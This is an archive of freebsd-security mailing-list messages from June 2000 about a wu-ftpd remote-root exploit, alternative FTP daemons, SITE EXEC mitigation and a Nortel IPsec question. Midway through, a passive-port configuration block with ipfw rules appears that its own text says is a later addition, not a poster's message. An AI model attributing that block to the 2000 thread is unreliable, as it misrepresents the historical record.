From: Mike Silbersack To: Mike Tancsa Cc: freebsd-security@FreeBSD.org Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 In-Reply-To: <4.2.2.20000622201823.0479a690@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hm, given the number of exploits for wu-ftpd in the last year and a half, I wonder if it should just be removed from the ports tree based on the assumption that there are more, and it's just a risk. (Does anyone actually still run it?) Mike "Silby" Silbersack On Thu, 22 Jun 2000, Mike Tancsa wrote: > > For those of you who missed it on Bugtraq :-( > > ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 20:38:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 1A5EE37B854 for ; Thu, 22 Jun 2000 20:38:48 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp ([192.168.0.2]) by cage.simianscience.com (8.9.3/8.9.3) with ESMTP id XAA02508; Thu, 22 Jun 2000 23:38:41 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20000622233159.0351a7d8@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 22 Jun 2000 23:34:26 -0400 To: Mike Silbersack 
From: Mike Tancsa Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 Cc: freebsd-security@FreeBSD.org In-Reply-To: References: <4.2.2.20000622201823.0479a690@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:34 PM 6/22/2000 -0500, Mike Silbersack wrote: >Hm, given the number of explots for wu-ftpd in the last year and a half, I >wonder if it should just be removed from the ports tree based on the >assumption that there are more, and it's just a risk. > >(Does anyone actually still run it?) A lot of people run it still. I would use the stock ftpd with FreeBSD if there was a better way to control anon uploads. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 21: 8:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 3DFA537B69F for ; Thu, 22 Jun 2000 21:08:47 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 85357 invoked by uid 1000); 23 Jun 2000 04:08:46 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 23 Jun 2000 04:08:46 -0000 Date: Thu, 22 Jun 2000 23:08:46 -0500 (CDT) 
From: Mike Silbersack To: Mike Tancsa Cc: freebsd-security@FreeBSD.org Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 In-Reply-To: <4.2.2.20000622233159.0351a7d8@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 22 Jun 2000, Mike Tancsa wrote: > At 10:34 PM 6/22/2000 -0500, Mike Silbersack wrote: > >Hm, given the number of explots for wu-ftpd in the last year and a half, I > >wonder if it should just be removed from the ports tree based on the > >assumption that there are more, and it's just a risk. > > > >(Does anyone actually still run it?) > > A lot of people run it still. I would use the stock ftpd with FreeBSD if > there was a better way to control anon uploads. > > ---Mike Hm, yeah, I tried searching freshmeat for ftpds, and proftpd seems like the only other full-featured one. Well, I'm getting glad I don't need to run a ftpd. :) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 21:22:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailbox.mcs.net (Mailbox.mcs.com [192.160.127.87]) by hub.freebsd.org (Postfix) with ESMTP id 1A23F37B5A4 for ; Thu, 22 Jun 2000 21:22:27 -0700 (PDT) (envelope-from spikeman@myself.com) Received: from myself.com (spikeman@nemean.spikeman.net [204.137.229.4]) by mailbox.mcs.net (8.9.3/8.9.3) with ESMTP id XAA17387; Thu, 22 Jun 2000 23:22:18 -0500 (CDT) (envelope-from spikeman@myself.com) Message-ID: <3952E620.2D8BC3A1@myself.com> Date: Thu, 22 Jun 2000 23:22:57 -0500 
From: Spikeman Organization: SDN - http://www.spikeman.net X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: Mike Silbersack Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ProFTPD does really well.. there were some exploits in it in younger versions but by far not as many as Wu FTPD... Mike Silbersack wrote: > On Thu, 22 Jun 2000, Mike Tancsa wrote: > > > At 10:34 PM 6/22/2000 -0500, Mike Silbersack wrote: > > >Hm, given the number of explots for wu-ftpd in the last year and a half, I > > >wonder if it should just be removed from the ports tree based on the > > >assumption that there are more, and it's just a risk. > > > > > >(Does anyone actually still run it?) > > > > A lot of people run it still. I would use the stock ftpd with FreeBSD if > > there was a better way to control anon uploads. > > > > ---Mike > > Hm, yeah, I tried searching freshmeat for ftpds, and proftpd seems like > the only other full-featured one. Well, I'm getting glad I don't need to > run a ftpd. :) > > Mike "Silby" Silbersack > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ___ /\ \ phase two of global domination in operation, hide all lions. /::\ \ /:/\:\ \ Comments or Questions email spikeman@myself.com _\:\~\:\ \ /\ \:\ \:\__\ Spikeman spikeman@myself.com \:\ \:\ \/__/ http://www.spikeman.net \:\ \:\__\ Find Me On EFNET /whois Spikeman \:\/:/ / \::/ / Friends are lights in winter; \/__/ The older the friend, the brighter the light. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 21:29: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id 9B83B37B8AF for ; Thu, 22 Jun 2000 21:29:04 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (control.fpsn.net [63.224.69.60]) by mail.fpsn.net (8.9.3/8.9.3) with ESMTP id WAA76644; Thu, 22 Jun 2000 22:24:16 -0600 (MDT) (envelope-from cfaber@fpsn.net) Message-ID: <3952E6B5.7123A453@fpsn.net> Date: Thu, 22 Jun 2000 22:25:25 -0600 
From: Colin Faber Reply-To: cfaber@fpsn.net Organization: fpsn.net, Inc. X-Mailer: Mozilla 4.6 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: Spikeman Cc: Mike Silbersack , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 References: <3952E620.2D8BC3A1@myself.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Agreed, with a correctly set up ProFTPD you can't go wrong. Much more powerful than the stock FTPd and many fewer exploits than WU's stuff. Spikeman wrote: > > ProFTPD does really where.. there were some explots in it in younger > versions but by fair not as many as Wu FTPD... > > Mike Silbersack wrote: > > > On Thu, 22 Jun 2000, Mike Tancsa wrote: > > > > > At 10:34 PM 6/22/2000 -0500, Mike Silbersack wrote: > > > >Hm, given the number of explots for wu-ftpd in the last year and a half, I > > > >wonder if it should just be removed from the ports tree based on the > > > >assumption that there are more, and it's just a risk. > > > > > > > >(Does anyone actually still run it?) > > > > > > A lot of people run it still. I would use the stock ftpd with FreeBSD if > > > there was a better way to control anon uploads. > > > > > > ---Mike > > > > Hm, yeah, I tried searching freshmeat for ftpds, and proftpd seems like > > the only other full-featured one. Well, I'm getting glad I don't need to > > run a ftpd. :) > > > > Mike "Silby" Silbersack > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > ___ > /\ \ phase two of global domination in operation, hide all lions. 
> /::\ \ > /:/\:\ \ Comments or Questions email spikeman@myself.com > _\:\~\:\ \ > /\ \:\ \:\__\ Spikeman spikeman@myself.com > \:\ \:\ \/__/ http://www.spikeman.net > \:\ \:\__\ Find Me On EFNET /whois Spikeman > \:\/:/ / > \::/ / Friends are lights in winter; > \/__/ The older the friend, the brighter the light. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 23: 7:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id DB90B37B94D for ; Thu, 22 Jun 2000 23:07:32 -0700 (PDT) (envelope-from todd@flyingcroc.net) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id XAA02183; Thu, 22 Jun 2000 23:05:31 -0700 (PDT) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Thu, 22 Jun 2000 23:05:31 -0700 (PDT) 
From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: Will Andrews Cc: Todd Backman , security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options In-Reply-To: <20000622222633.C67587@argon.gryphonsoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If I could get a good sysadmin I would. 300+ FreeBSD servers are a bit much for me to handle... ;^) Thanks. - Todd On Thu, 22 Jun 2000, Will Andrews wrote: > On Thu, Jun 22, 2000 at 05:01:06PM -0700, Todd Backman wrote: > > Can anyone hit me with the cluestick? > > Sure. Try having an up-to-date FreeBSD source tree. :-) > > In that case you won't even need the patches. :-) > > -- > Will Andrews > GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- > ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ > G++>+++ e->++++ h! r-->+++ y? > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 4: 1:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 0939B37C20A for ; Fri, 23 Jun 2000 04:01:49 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp ([192.168.0.2]) by cage.simianscience.com (8.9.3/8.9.3) with ESMTP id HAA03367; Fri, 23 Jun 2000 07:01:45 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20000623065600.0323bf08@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Fri, 23 Jun 2000 06:57:32 -0400 To: Mike Silbersack 
From: Mike Tancsa Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <4.2.2.20000622233159.0351a7d8@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:08 PM 6/22/2000 -0500, Mike Silbersack wrote: >Hm, yeah, I tried searching freshmeat for ftpds, and proftpd seems like >the only other full-featured one. Well, I'm getting glad I don't need to >run a ftpd. :) It's had its share as well if I recall correctly. Don't know if as many, or if the authors are that much more careful about coding for security. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 6:38:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from altair.origenbio.com (altair.origenbio.com [216.30.62.130]) by hub.freebsd.org (Postfix) with ESMTP id 2850437B9F2 for ; Fri, 23 Jun 2000 06:38:27 -0700 (PDT) (envelope-from dmartin@origen.com) Received: from origen.com (dubhe.origen [192.168.0.5]) by altair.origenbio.com (8.9.3/8.9.3) with ESMTP id IAA27442; Fri, 23 Jun 2000 08:38:18 -0500 (CDT) (envelope-from dmartin@origen.com) Message-ID: <39538382.DE37562A@origen.com> Date: Fri, 23 Jun 2000 08:34:26 -0700 
From: Richard Martin X-Mailer: Mozilla 4.73 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Mike Tancsa Cc: Mike Silbersack , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: References: <4.2.2.20000622233159.0351a7d8@mail.sentex.net> <4.2.2.20000623065600.0323bf08@mail.sentex.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How about the relative obscurity route - using a less widespread FTP system, like ncftpd? Granted it costs, but the license is only about $30. Anyone have any experience with this one? -- Richard Martin dmartin@origen.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 6:42:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from www.doutlets.com (cj123195-a.alex1.va.home.com [24.13.245.248]) by hub.freebsd.org (Postfix) with ESMTP id DED8E37B9F2 for ; Fri, 23 Jun 2000 06:42:14 -0700 (PDT) (envelope-from marcus@doutlets.com) Received: from cj123195-a.alex1.va.home.com (marcus@cj123195-a.alex1.va.home.com [24.13.245.248]) by www.doutlets.com (8.10.2/8.10.1) with ESMTP id e5NDg9e30390; Fri, 23 Jun 2000 13:42:09 GMT Date: Fri, 23 Jun 2000 13:42:08 +0000 (GMT) 
From: Mark Canter To: Richard Martin Cc: Mike Tancsa , Mike Silbersack , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: In-Reply-To: <39538382.DE37562A@origen.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have chosen to stick with proftpd (www.proftpd.net), license is GPL. Config-style is similar to apache. On Fri, 23 Jun 2000, Richard Martin wrote: > How about the relative obscurity route - using a less widespread FTP > system, like ncftpd? Granted it costs, but the license is only about > $30. > > Anyone have any experience with this one? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 6:51:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id EA92837C333 for ; Fri, 23 Jun 2000 06:51:34 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id KAA07596 for security@freebsd.org; Fri, 23 Jun 2000 10:48:41 -0300 (GMT) 
From: Fernando Schapachnik Message-Id: <200006231348.KAA07596@ns1.via-net-works.net.ar> Subject: Passive FTP ports in ProFTPd To: security@freebsd.org Date: Fri, 23 Jun 2000 10:48:40 -0300 (GMT) Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello: (I know I should be better off asking in some ProFTPd list, but I'm not subscribed right now to any of them and maybe somebody here faced the same troubles.) I switched to ProFTPd due to the wu-ftpd exploit posted today. The thing is, I used the "passive port " directive of wu-ftpd in order to match these ports in the firewall. Does anybody know how to achieve the same with ProFTPd? I couldn't find anything similar in the docs. Thanks! Fernando P. Schapachnik Network Administration VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 7:58:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from fling.sanbi.ac.za (fling.sanbi.ac.za [196.38.142.119]) by hub.freebsd.org (Postfix) with ESMTP id 3E48237B913 for ; Fri, 23 Jun 2000 07:58:24 -0700 (PDT) (envelope-from johann@egenetics.com) Received: from johann by fling.sanbi.ac.za with local (Exim 3.13 #4) id 135Ut6-0003ef-00; Fri, 23 Jun 2000 16:56:56 +0200 Date: Fri, 23 Jun 2000 16:56:56 +0200 
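For the passive-port question above, an added configuration example that is not from any poster in the thread and not taken from the wu-ftpd or ProFTPD documentation: the wu-ftpd ftpaccess `passive ports` directive the poster was using, the ProFTPD `PassivePorts` directive that does the same job (it may be newer than the ProFTPD release current when this thread was written, so check your version's documentation), and the ipfw rules that admit exactly that range. The server address 192.0.2.10, the port range 49152-49407 and the rule numbers are assumptions chosen for the example.

```conf
# --- wu-ftpd: /etc/ftpaccess (what the poster had before switching) ---
# PASV data connections are offered only from this range, so the firewall
# can allow exactly that range. The CIDR selects which clients get it;
# 0.0.0.0/0 means every client.
passive ports 0.0.0.0/0 49152 49407

# --- ProFTPD: proftpd.conf (the equivalent directive) ---
# Restricts the ports the server binds for passive data connections.
# Goes in the server context or inside a <VirtualHost> block.
PassivePorts 49152 49407

# --- ipfw, FreeBSD 4.x syntax; 192.0.2.10 stands in for the server's
#     address and the rule numbers are made up for this example ---
# Control connection:
#   ipfw add 1000 allow tcp from any to 192.0.2.10 21 in setup
# Passive data connections, limited to the range configured above:
#   ipfw add 1010 allow tcp from any to 192.0.2.10 49152-49407 in setup
# Anything else inbound to the server that is not already an established
# connection stays subject to whatever deny rules follow.
```

If the firewall is a separate box in front of the server the same two rules apply there. Keep the range clear of ports other daemons on the host listen on, since the rules admit new connections to every port in it, and check the result from outside with a passive-mode client (`ftp -p host`, then `ls`) after the change.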
From: Johann Visagie To: Fernando Schapachnik Cc: security@FreeBSD.ORG Subject: Re: Passive FTP ports in ProFTPd Message-ID: <20000623165656.D13039@fling.sanbi.ac.za> References: <200006231348.KAA07596@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200006231348.KAA07596@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Fri, Jun 23, 2000 at 10:48:40AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Fernando Schapachnik on 2000-06-23 at 10:48:40 -0300: > > I switched to ProFTPd due to the wu-ftpd exploit posted today. Despite the fact that ProFTPd is advertised as secure, it has had several security scares and is generally regarded (at least among the people I talk to) as being a bad choice from a security perspective. See for instance what Dan Bernstein has to say about it: http://cr.yp.to/publicfile.html (3/4 way down the page) -- V To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8: 0:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from oxmail.ox.ac.uk (oxmail3.ox.ac.uk [129.67.1.180]) by hub.freebsd.org (Postfix) with ESMTP id C7DBF37B913 for ; Fri, 23 Jun 2000 08:00:14 -0700 (PDT) (envelope-from neil.long@computing-services.oxford.ac.uk) Received: from ratbert.oucs.ox.ac.uk ([163.1.14.71]) by oxmail.ox.ac.uk with esmtp (Exim 3.12 #1) id 135UwD-0001uq-00 for freebsd-security@freebsd.org; Fri, 23 Jun 2000 16:00:09 +0100 Received: from neil by ratbert.oucs.ox.ac.uk with local (Exim 3.14 #1) id 135Uvj-00032e-00 for freebsd-security@FreeBSD.ORG; Fri, 23 Jun 2000 15:59:39 +0100 
From: "Neil Long" Message-Id: <1000623155939.ZM11694@ratbert.oucs.ox.ac.uk> Date: Fri, 23 Jun 2000 15:59:39 +0100 In-Reply-To: Mark Canter "Re: Fwd: WuFTPD:" (Jun 23, 1:42pm) References: X-Mailer: Z-Mail (5.0.0 30July97) To: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Looking, albeit briefly, at the exploit and the wu-ftpd src, might it not be simpler to either define PARANOID (there is a configure option in 2.6) or just plain rip out SITE EXEC support altogether? I am not saying this is a fix, but in the short term while the exploit code is still in early stages of widespread distribution (it has a "broken to avoid kids usage ;)" comment but I have not looked into it.) Neil -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dr Neil J Long, Computing Services, University of Oxford 13 Banbury Road, Oxford, OX2 6NN, UK Tel:+44 1865 273232 Fax:+44 1865 273275 EMail: Neil.Long@computing-services.oxford.ac.uk PGP: ID 0xE88EF71F OxCERT: oxcert@ox.ac.uk PGP: ID 0x4B11561D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8:19:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from sharmas.dhs.org (c62443-a.frmt1.sfba.home.com [24.0.69.165]) by hub.freebsd.org (Postfix) with ESMTP id 63A3937B6F2 for ; Fri, 23 Jun 2000 08:19:15 -0700 (PDT) (envelope-from adsharma@sharmas.dhs.org) Received: (from adsharma@localhost) by sharmas.dhs.org (8.9.3/8.9.3) id IAA00968 for security@freebsd.org; Fri, 23 Jun 2000 08:18:28 -0700 Date: Fri, 23 Jun 2000 08:18:28 -0700 
From: Arun Sharma To: security@freebsd.org Subject: FreeBSD 4.0 ipsec and Nortel extranet Message-ID: <20000623081828.A963@sharmas.dhs.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My work place uses Nortel extranet ipsec for VPN and I'm forced to connect using my windows box. I was wondering if anyone had any success connecting a FreeBSD box to the Nortel server. Any pointers would be highly appreciated. -Arun To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8:20: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 3A5F437B556 for ; Fri, 23 Jun 2000 08:20:00 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id MAA28360; Fri, 23 Jun 2000 12:19:10 -0300 (GMT) 
From: Fernando Schapachnik Message-Id: <200006231519.MAA28360@ns1.via-net-works.net.ar> Subject: Re: Passive FTP ports in ProFTPd In-Reply-To: <20000623165656.D13039@fling.sanbi.ac.za> from Johann Visagie at "Jun 23, 0 04:56:56 pm" To: johann@egenetics.com (Johann Visagie) Date: Fri, 23 Jun 2000 12:19:10 -0300 (GMT) Cc: fpscha@via-net-works.net.ar, security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In an earlier message, Johann Visagie wrote: > Fernando Schapachnik on 2000-06-23 at 10:48:40 -0300: > > > > I switched to ProFTPd due to the wu-ftpd exploit posted today. > > Despite the fact that ProFTPd is advertised as secure, it has had several > security scares and is generally regarded (at least among the people I to > talk to) as being a bad choice from a security perspective. > > See for instance what Dan Bernstein has to say about it: > http://cr.yp.to/publicfile.html (3/4 way down the page) Not very encouraging... The ones he mentions as "secure" lack most features I need. Any suggestion? (I can't use stock FreeBSD ftpd right now because it will require a lot of programming -- I need to maintain configuration compatibility across platforms). Thanks! Fernando P. Schapachnik Network Administration VIA NET.WORKS ARGENTINA S.A. 
fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8:22:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from neo.bleeding.com (neo.bleeding.com [209.10.61.250]) by hub.freebsd.org (Postfix) with ESMTP id D5D7E37B721 for ; Fri, 23 Jun 2000 08:22:06 -0700 (PDT) (envelope-from jjwolf@bleeding.com) Received: from localhost (jjwolf@localhost) by neo.bleeding.com (8.9.3/8.9.3) with ESMTP id IAA61342; Fri, 23 Jun 2000 08:21:51 -0700 (PDT) Date: Fri, 23 Jun 2000 08:21:51 -0700 (PDT) 
From: Justin Wolf To: Arun Sharma Cc: security@FreeBSD.ORG Subject: Re: FreeBSD 4.0 ipsec and Nortel extranet In-Reply-To: <20000623081828.A963@sharmas.dhs.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The newsgroup comp.dcom.sys.bay-networks sometimes talks about Nortel's extranet products. You might try there. -Justin On Fri, 23 Jun 2000, Arun Sharma wrote: > My work place uses Nortel extranet ipsec for VPN and I'm forced to > connect using my windows box. I was wondering if anyone had any > success connecting a FreeBSD box to the Nortel server. > > Any pointers would be highly appreciated. > > -Arun > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 8:54: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from icg.interactivate.com (icg.interactivate.com [207.110.42.216]) by hub.freebsd.org (Postfix) with ESMTP id D1A4837B92E for ; Fri, 23 Jun 2000 08:53:58 -0700 (PDT) (envelope-from larry@interactivate.com) Received: from localhost (larry@localhost) by icg.interactivate.com (8.10.1/8.10.1) with ESMTP id e5NFukR04254; Fri, 23 Jun 2000 08:56:46 -0700 (PDT) Date: Fri, 23 Jun 2000 08:56:45 -0700 (PDT) 
From: Larry Sica X-Sender: larry@icg To: Richard Martin Cc: Mike Tancsa , Mike Silbersack , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: In-Reply-To: <39538382.DE37562A@origen.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 23 Jun 2000, Richard Martin wrote: > How about the relative obscurity route - using a less widespread FTP > system, like ncftpd? Granted it costs, but the license is only about > $30. > > Anyone have any experience with this one? I use it on all my servers, it's only 49.99 for a 50-user license, unlimited is like 199 I think, have to check on that. It does not run out of inetd (which is nice), has its own logging facility (which can be tied to syslog), allows for virtual users as well so you could set up users w/o shells or give users different ftp passwords. It supports all the usual stuff, /etc/shells, ftpuser, etc. Its configuration also allows for multiple domains hosted on the same server; think vhosting of websites, it's similar to that. The domain is www.ncftp.com. Oh yeah, it's free for personal use (3 or more sim. users). > > -- > Richard Martin dmartin@origen.com > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 9:21:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from molybdenum.systems.cais.net (molybdenum.systems.cais.net [205.177.9.248]) by hub.freebsd.org (Postfix) with ESMTP id A5C6A37B764 for ; Fri, 23 Jun 2000 09:21:17 -0700 (PDT) (envelope-from herb@cais.net) Received: from localhost (localhost [127.0.0.1]) by molybdenum.systems.cais.net (8.9.3/8.9.3) with ESMTP id MAA17570 for ; Fri, 23 Jun 2000 12:39:02 -0400 (EDT) Date: Fri, 23 Jun 2000 12:39:02 -0400 (EDT) 
